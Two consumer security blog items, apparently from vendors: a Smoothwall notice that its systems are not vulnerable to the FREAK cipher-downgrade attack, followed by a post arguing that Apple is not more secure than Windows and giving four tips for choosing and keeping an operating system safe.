In light of the recent "FREAK" vulnerability, in which web servers and web browsers can be cajoled into using older, more vulnerable ciphers in encrypted communications, we would like to assure customers that the web server configuration on an up-to-date Smoothwall system is not vulnerable to this attack.

Similarly, if you are using "HTTPS Decrypt & Inspect" in Smoothwall, your clients' browsers will afforded some protection from attack, as their traffic will be re-encrypted by the web filter, which does not support downgrading to these "Export Grade" ciphers.

Which operating system is the most secure? Four points to remember.

No, you are almost certainly wrong if you tried to guess. A recent study shows that products from Apple actually are at the top when counting vulnerabilities, and that means at the bottom security-wise. Just counting vulnerabilities is not a very scientific way to measure security, and there is a debate over how to interpret the figures. But this is anyway a welcome eye-opener that helps kill old myths.

Apple did for a long time stubbornly deny security problems and their marketing succeeded in building an image of security. Meanwhile Windows was the biggest and most malware-targeted system. Microsoft rolled up the sleeves and fought at the frontline against viruses and vulnerabilities. Their reputation suffered but Microsoft gradually improved in security and built an efficient process for patching security holes. Microsoft had what is most important in security, the right attitude. Apple didn’t and the recent vulnerability study shows the result.

Here’s four points for people who want to select a secure operating system.

  • Forget reputation when thinking security. Windows used to be bad and nobody really cared to attack Apple’s computers before they became popular. The old belief that Windows is unsafe and Apple is safe is just a myth nowadays.
  • There is malware on almost all commonly used platforms. Windows Phone is the only exception with practically zero risk. Windows and Android are the most common systems and malware authors are targeting them most. So the need for an anti-malware product is naturally bigger on these systems. But the so called antivirus products of today are actually broad security suites. They protect against spam and harmful web sites too, just to mention some examples. So changes are that you want a security product anyway even if your system isn’t one of the main malware targets.
  • So which system is most secure? It’s the one that is patched regularly. All the major systems, Windows, OS X and Linux have sufficient security for a normal private user. But they will also all become unsafe if the security updates are neglected. So security is not really a selection criteria for ordinary people.
  • Mobile devices, phones and tablets, generally have a more modern systems architecture and a safer software distribution process. Do you have to use a desktop or laptop, or can you switch to a tablet? Dumping the big old-school devices is a way to improve security. Could it work for you?

So all this really boils down to the fact that you can select any operating system you like and still be reasonable safe. There are some differences though, but it is more about old-school versus new-school devices. Not about Apple versus Microsoft versus Linux. Also remember that your own behavior affects security more than your choice of device, and that you never are 100% safe no matter what you do.

 

Safe surfing,
Micke

 

Added February 27th. Yes, this controversy study has indeed stirred a heated debate, which isn’t surprising at all. Here’s an article defending Apple. It has flaws and represent a very limited view on security, but one of its important points still stands. If someone still thinks Apple is immortal and invincible, it’s time to wake up. And naturally that this whole debate is totally meaningless for ordinary users. Just keep patching what you have and you will be fine. 🙂 Thanks to Jussi (and others) for feedback.